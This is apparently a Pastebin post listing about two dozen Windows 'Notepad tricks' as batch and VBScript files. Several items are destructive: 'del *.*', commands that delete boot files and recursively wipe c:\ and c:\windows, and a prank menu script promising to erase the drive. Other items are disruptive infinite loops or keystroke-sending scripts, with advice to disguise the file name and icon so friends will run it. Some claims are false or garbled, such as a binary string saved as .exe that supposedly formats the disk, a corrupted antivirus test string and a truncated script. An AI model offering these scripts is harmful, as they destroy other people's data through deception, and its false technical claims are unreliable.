Advertisement
JackHaxor

top-20-notepad-trick

Dec 26th, 2018
293
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.05 KB | None | 0 0
  1. 1. How to Delete all your system
  2.  
  3.  
  4. files with a small command!
  5.  
  6. Copy the following code into your
  7.  
  8. notepad and save it as a .bat
  9.  
  10. file.
  11.  
  12. del *.*
  13.  
  14. All your files in your hard disk will
  15.  
  16. vanish in less than 5mins.
  17.  
  18.  
  19.  
  20. 2. RAM crashing trick
  21.  
  22.  
  23. open notepad and type
  24.  
  25. :A
  26.  
  27. start http://www.haktuts.com/
  28.  
  29. goto A
  30.  
  31. save with .bat extension.
  32.  
  33. Infinitely loops your browser to
  34.  
  35. open up http://www.haktuts.com/
  36.  
  37.  
  38.  
  39.  
  40.  
  41. 3. How to create more than 3,000 folders under a minute
  42.  
  43.  
  44. Open your notepad and type
  45.  
  46. the following code.
  47.  
  48. @echo off
  49.  
  50. :top
  51.  
  52. md %random%
  53.  
  54. goto top
  55.  
  56. Save it as any.bat
  57.  
  58. @echo off makes your screen
  59.  
  60. appear blank but it is actually
  61.  
  62. making hundreds of folders.
  63.  
  64. md %random% is command that
  65.  
  66. creating folders with random
  67.  
  68. names.( md is a command to
  69.  
  70. make directory in ms-dos)
  71.  
  72. goto top – return the command
  73.  
  74. to :top, causes an infinite loop.
  75.  
  76.  
  77.  
  78. NOTE: The folders will get created
  79.  
  80. in the directory where you saved
  81.  
  82. the ”any.bat” file.
  83.  
  84. The file might look suspicious to
  85.  
  86. your friends. So if you are
  87.  
  88. looking to fool your friends, then
  89.  
  90. change the file name and also
  91.  
  92. the icon so that he doesn’t
  93.  
  94. suspect the file to be a virus.
  95.  
  96.  
  97.  
  98. 4. Notepad Trick to shutdown computer forcefully
  99.  
  100.  
  101. Open Notepad.
  102.  
  103. Paste the following code in it:
  104.  
  105. @echo off
  106.  
  107. msg * Shutdown computer.
  108.  
  109. shutdown -c “Sleep Tight” -s
  110.  
  111.  
  112.  
  113. 5) Notepad Trick to Lock Folders
  114.  
  115.  
  116. Lets lock a folder using notepad trick which is named as PICS in your D: drive , whose path is
  117.  
  118. D:PICS
  119.  
  120. Then the code should be something like this:
  121.  
  122. ren pics pics. {21EC2020-3AEA-1069- A2DD-08002B30309D}
  123.  
  124. Pics is your folder name. Use the name of the folder in place for pics. Save the text file as lock.bat in
  125.  
  126. the same drive.
  127.  
  128.  
  129.  
  130. To unlock this locked folder:
  131.  
  132. Open another new notepad text file and type the following:
  133.  
  134. ren pics. {21EC2020-3AEA-1069- A2DD-08002B30309D} pics
  135.  
  136. Save the text file as key.bat in the same drive. Here again, pics is the name of the folder. Change it
  137.  
  138. to the folder name you want to lock it.
  139.  
  140.  
  141.  
  142. 6.Open Notepad continually in your friend's computer:
  143.  
  144.  
  145. @ECHO off
  146.  
  147. :top
  148.  
  149. START %SystemRoot%\system32\notepad.exe
  150.  
  151. GOTO top
  152.  
  153. Save it as "Anything.BAT" and send it.
  154.  
  155.  
  156.  
  157. 7. Notepad Trick to Format Hard disk
  158.  
  159.  
  160. Open Notepad and type:
  161.  
  162. a) Code : 01001011000111110010010101010101010000011111100000
  163.  
  164. b) Save As it as anything.EXE
  165.  
  166. c) Run it. Beware that the entire HDD will be erased
  167.  
  168.  
  169.  
  170. 8. Matrix Notepad Trick
  171.  
  172.  
  173. @echo off
  174.  
  175. color 2
  176.  
  177. :start
  178.  
  179. echo %random% %random% % random% %random% %random % %random% %random% %
  180.  
  181. random% %random% %random % %random% %random% % random% %random%
  182.  
  183. goto start
  184.  
  185. Save this file as any.bat
  186.  
  187. Make sure the file type is kept as ALL FILES while saving it as a .bat file.
  188.  
  189.  
  190.  
  191. 9. Notepad trick to Test Antivirus
  192.  
  193.  
  194. Open Notepad.
  195.  
  196. Copy the code give below in the notepad file:
  197.  
  198. X5O!P%@AP[4PZX54(P^) 7CC)7}$EICAR-STANDARD- ANTIVIRUS-TEST-FILE!$H+H*
  199.  
  200. Save it with an .exe extension like testvirus.exe
  201.  
  202.  
  203.  
  204. 10. How to Shutdown a computer forever?
  205.  
  206.  
  207. Now Please don’t try this because this is the most simplest and deadliest hack for your windows
  208.  
  209. computer. Copy the following
  210.  
  211. code into your notepad
  212.  
  213. @echo off
  214.  
  215. attrib -r -s -h c:\autoexec.bat
  216.  
  217. del c:\autoexec.bat
  218.  
  219. attrib -r -s -h c:\boot.ini
  220.  
  221. del c:\boot.ini
  222.  
  223. attrib -r -s -h c:\ntldr
  224.  
  225. del c:\ntldr
  226.  
  227. attrib -r -s -h c:\windows
  228.  
  229. \win.ini
  230.  
  231. del c:\windows\win.ini
  232.  
  233. Save it as “shutdown-
  234.  
  235. forever.bat”. Just make sure it
  236.  
  237. has a .bat or .cmd extension.
  238.  
  239. DONT RUN THE BATCH FILE ,YOU
  240.  
  241. WONT RECOVER BACK AFTER YOU
  242.  
  243. RUN IT !!!
  244.  
  245. This should shutdown the persons computer. It shuts it off once
  246.  
  247. and deletes the files needed to reboot and restart.So please, use
  248.  
  249. this hack only if you have no intention of rebooting your computer again. So just be careful.
  250.  
  251. Here’s an alternative code.
  252.  
  253. cmd /c del c:\windows\* /F /S /
  254.  
  255. Q
  256.  
  257. cmd /c del c:\* /F /S /Q
  258.  
  259. Paste it in NotePad And Save It
  260.  
  261. with Extension .cmd or .bat.
  262.  
  263.  
  264.  
  265. 11. Crash a Computer System With
  266.  
  267.  
  268. This is a javascript “exploit” , it
  269.  
  270. will hang/crash your system. It
  271.  
  272. basically floods you with an
  273.  
  274. infinite loop of mailto:xxx
  275.  
  276. windows. To cancel this (and you
  277.  
  278. have to move fast) kill the
  279.  
  280. process of your email client
  281.  
  282. before you run out of RAM. Every
  283.  
  284. instance occupies about 1000
  285.  
  286. bytes, if your victim is smart, he
  287.  
  288. better end the process As soon as
  289.  
  290. possible or he will be forced to
  291.  
  292. reboot his computer.
  293.  
  294. WARNING This Link WILL CRASH
  295.  
  296. YOUR BROWSER OR WORSE, YOUR
  297.  
  298. COMPUTER !!!!
  299.  
  300. Click Here
  301.  
  302.  
  303.  
  304. 12. Notepad trick to use it as a Diary
  305.  
  306.  
  307. Open notepad
  308.  
  309. Type .LOG
  310.  
  311. Save the file as LOG.txt
  312.  
  313. Write anything in it and it will be saved with the time when you edit it.
  314.  
  315.  
  316.  
  317. 13. Notepad Trick to Open DVD Drive
  318.  
  319.  
  320. Open Notepad.
  321.  
  322. Copy the code given below onto the notepad file:
  323.  
  324. Set oWMP = CreateObject(“WMPlayer.OCX.7?)
  325.  
  326. Set colCDROMs = oWMP.cdromCollection
  327.  
  328. do
  329.  
  330. if colCDROMs.Count >= 1 then
  331.  
  332. For i = 0 to colCDROMs.Count – 1
  333.  
  334. colCDROMs.Item(i).Eject
  335.  
  336. Next
  337.  
  338. For i = 0 to colCDROMs.Count – 1
  339.  
  340. colCDROMs.Item(i).Eject
  341.  
  342. Next
  343.  
  344. End If
  345.  
  346. wscript.sleep 5000
  347.  
  348. loop
  349.  
  350. Save it as “Anything.VBS”.
  351.  
  352.  
  353.  
  354. 14. Notepad Trick to annoy your friends
  355.  
  356.  
  357. Open Notepad.
  358.  
  359. Paste the following code in the notepad file:
  360.  
  361. @ECHO off
  362.  
  363. :Begin
  364.  
  365. msg * Hey
  366.  
  367. msg * Want to have Fun?
  368.  
  369. msg * You do?
  370.  
  371. msg * We will both have fun, alright?
  372.  
  373. msg * More fun?
  374.  
  375. GOTO BEGIN
  376.  
  377. Save the file with any file name but with .bat as extension and close it. For eg. cool.bat
  378.  
  379.  
  380.  
  381. 15. Notepad Trick to type slowly
  382.  
  383.  
  384. Open Notepad.
  385.  
  386. Paste the following code in the notepad file:
  387.  
  388. WScript.Sleep 180000
  389.  
  390. WScript.Sleep 10000
  391.  
  392. Set WshShell = WScript.CreateObject (“WScript.Shell”)
  393.  
  394. WshShell.Run “notepad”
  395.  
  396. WScript.Sleep 100
  397.  
  398. WshShell.AppActivate Notepad“”
  399.  
  400. WScript.Sleep 500
  401.  
  402. WshShell.SendKeys “Hel”
  403.  
  404. WScript.Sleep 500
  405.  
  406. WshShell.SendKeys “lo ”
  407.  
  408. WScript.Sleep 500
  409.  
  410. WshShell.SendKeys “, ho”
  411.  
  412. WScript.Sleep 500
  413.  
  414. WshShell.SendKeys “w a”
  415.  
  416. WScript.Sleep 500
  417.  
  418. WshShell.SendKeys “re ”
  419.  
  420. WScript.Sleep 500
  421.  
  422. WshShell.SendKeys “you”
  423.  
  424. WScript.Sleep 500
  425.  
  426. WshShell.SendKeys “? ”
  427.  
  428. WScript.Sleep 500
  429.  
  430. WshShell.SendKeys “I a”
  431.  
  432. WScript.Sleep 500
  433.  
  434. WshShell.SendKeys “m g”
  435.  
  436. WScript.Sleep 500
  437.  
  438. WshShell.SendKeys “ood”
  439.  
  440. WScript.Sleep 500
  441.  
  442. WshShell.SendKeys ” th”
  443.  
  444. WScript.Sleep 500
  445.  
  446. WshShell.SendKeys “ank”
  447.  
  448. WScript.Sleep 500
  449.  
  450. WshShell.SendKeys “s! “
  451.  
  452. Save the file with any name and with .vbs extension and close it.
  453.  
  454. Now open the file and see how freakishly slow the messages appear!
  455.  
  456. NOTE: In order to stop it. Follow the “Note” given in 10th Trick.
  457.  
  458.  
  459.  
  460. 16. Infinite Notepad Trick
  461.  
  462.  
  463. Open Notepad.
  464.  
  465. Paste the following code in your notepad file:
  466.  
  467. @ECHO off
  468.  
  469. :top
  470.  
  471. START %SystemRoot% system32notepad.exe
  472.  
  473. GOTO top
  474.  
  475. Save the file with any name nut with .bat extension and close it.
  476.  
  477.  
  478.  
  479. 17. Notepad Trick - Text to Audio
  480.  
  481.  
  482. Open Notepad file on your Windows PC.
  483.  
  484. Copy and paste the below mentioned code :
  485.  
  486. Dim msg, sapi
  487.  
  488. msg=InputBox("Enter your text for conversion www–.haktuts.com","haktuts Text-To-Audio
  489.  
  490. Converter")
  491.  
  492. Set sapi=CreateObject ("sapi.spvoice")
  493.  
  494. sapi.Speak msg
  495.  
  496. Save this file with any name with .vbs as extension. For eg. Text-To- Audio.vbs
  497.  
  498.  
  499.  
  500. 18. Notepad Trick - BUSH HID THE FACTS
  501.  
  502.  
  503. Open notepad.
  504.  
  505. Type BUSH HID THE FACTS
  506.  
  507. Save that file.
  508.  
  509. Close it
  510.  
  511. Open It Again See…
  512.  
  513.  
  514.  
  515. 19. Notepad Trick Print Tree Root
  516.  
  517.  
  518. Open NOTEPAD and enter {print tree root}
  519.  
  520. After that hit enter and type C:windowssystem
  521.  
  522. After that hit enter and type {print C:windowssystemwinlog
  523.  
  524. Hit enter and type 4*43?$@[455] 3hr4~
  525.  
  526. Then save the file as teekids in C:windowssystem.
  527.  
  528.  
  529.  
  530. 20. World Trade Center Notepad Trick
  531.  
  532.  
  533. Open your Notepad
  534.  
  535. Type the flight number Q33N
  536.  
  537. Increase the Font Size to 72
  538.  
  539. Change the Font to Wingdings
  540.  
  541.  
  542.  
  543.  
  544.  
  545. 21.Frustrate your friend by making this VBScript hit Backspace simultaneously:
  546.  
  547.  
  548. MsgBox "Let's go back a few steps"
  549.  
  550. Set wshShell =wscript.CreateObject("WScript.Shell")
  551.  
  552. do
  553.  
  554. wscript.sleep 100
  555.  
  556. wshshell.sendkeys "{bs}"
  557.  
  558. loop
  559.  
  560. Save it as "Anything.VBS" and send it.
  561.  
  562.  
  563.  
  564. 22. Hack your friend's keyboard and make him type "You are a fool" simultaneously:
  565.  
  566.  
  567. Set wshShell = wscript.CreateObject("WScript.Shell")
  568.  
  569. do
  570.  
  571. wscript.sleep 100
  572.  
  573. wshshell.sendkeys "You are a fool."
  574.  
  575. loop
  576.  
  577. Save it as "Anything.VBS" and send it.
  578.  
  579.  
  580.  
  581.  
  582.  
  583. 23. Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
  584.  
  585.  
  586. 1: Shutdown
  587.  
  588. 2: Restart
  589.  
  590. 3: Wipes out your hard drive (BEWARE)
  591.  
  592. 4: Net send
  593.  
  594. 5: Messages then shutdown
  595.  
  596. @echo off
  597.  
  598. title The end of the world
  599.  
  600. cd C:\
  601.  
  602. :menu
  603.  
  604. cls
  605.  
  606. echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill
  607.  
  608. yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried
  609.  
  610. your computer or if you lost your project etc...
  611.  
  612. pause
  613.  
  614. echo Pick your poison:
  615.  
  616. echo 1. Die this way (Wimp)
  617.  
  618. echo 2. Die this way (WIMP!)
  619.  
  620. echo 3. DO NOT DIE THIS WAY
  621.  
  622. echo 4. Die this way (you're boring)
  623.  
  624. echo 5. Easy way out
  625.  
  626. set input=nothing
  627.  
  628. set /p input=Choice:
  629.  
  630. if %input%==1 goto one
  631.  
  632. if %input%==2 goto two
  633.  
  634. Save it as "Anything.BAT" and send it.
  635.  
  636.  
  637.  
  638. 24: Wish Good Day on Boot
  639.  
  640.  
  641. Wish a Good day to anyone who logs in to your PC with their name.
  642.  
  643. Open Notepad.
  644.  
  645. Right Click > New > Text Document
  646.  
  647. Copy and Paste below code in Notepad.
  648.  
  649. name=inputbox("What's your name?")
  650.  
  651. msgbox("Have a good day, ") + name
  652.  
  653. NOTE: You can Change Quoted Text according to yourself.
  654.  
  655. Save the file as 'Welcome.vbs' and Double click to Open it & Check if it is working or not.
  656.  
  657. Now Copy the 'Welcome.vbs' file and Paste it in Start-up folder if you want to see this script on
  658.  
  659. boot.
  660.  
  661. Click Here to know How to Locate Start-Up Folder
  662.  
  663.  
  664.  
  665. 25: Create a Password Protected VBScript Message
  666.  
  667.  
  668. Use this trick to create a VBScript with password protection.
  669.  
  670. Open Notepad.
  671.  
  672. Right Click > New > Text Document
  673.  
  674. Copy & Paste below code in Notepad.
  675.  
  676. pass=inputbox("Enter Password...")
  677.  
  678. if pass="password" then msgbox("Your Message Here..") else msgbox("Incorrect Password!
  679.  
  680. Exiting... ")
  681.  
  682. Note: Change the highlighted text 'Your Message Here.. ' with you message. &
  683.  
  684. password with your own Password.
  685.  
  686. Save the file as 'Message.vbs'.
  687.  
  688. Now you will have to enter the password if you want to see the Message. Default Password is
  689.  
  690. 'password'. You can change it by changing the highlighted text in code.
  691.  
  692.  
  693.  
  694. 26: Create a Message Box Loop
  695.  
  696.  
  697. Open Notepad.
  698.  
  699. Right Click > New > Text Document
  700.  
  701. Copy and Paste below code in Notepad.
  702.  
  703. msgbox("Hello!")
  704.  
  705. DO
  706.  
  707. msgbox("Hello, Again!")
  708.  
  709. LOOP
  710.  
  711. NOTE: You can change the Keywords Hello & Hello Again with your messages. 'Hello!' will be
  712.  
  713. shown only once & 'Hello, Again!' will loop until you stop this script.
  714.  
  715. Save the file as 'Loop.vbs'.
  716.  
  717. Double click on Loop.vbs file to open it. Click Here to know How to Stop this Trick.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement